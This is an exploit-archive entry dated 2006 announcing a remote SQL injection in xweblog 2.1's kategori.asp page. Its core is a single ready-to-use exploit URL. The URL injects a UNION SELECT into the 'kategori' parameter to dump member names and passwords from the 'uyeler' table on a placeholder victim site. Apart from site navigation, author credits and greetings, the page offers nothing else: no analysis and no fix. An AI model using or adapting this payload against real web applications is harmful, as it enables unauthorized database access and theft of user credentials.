xweblog <= 2.1 (kategori.asp) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : xweblog <= 2.1 (kategori.asp) Remote SQL Injection Vulnerability
# Published : 2006-09-22
# Author : Muhacir
# Previous Title : exV2 <= 2.0.4.3 extract() Remote Command Execution Exploit
# Next Title : Eskolar CMS 0.9.0.0 (index.php) Remote SQL Injection Exploit

# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability

# Author : Muhacir

# Source : http://www.aspindir.com/goster/4386

# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler

# Greetz To : str0ke :)

# www.Syue.com [2006-09-22]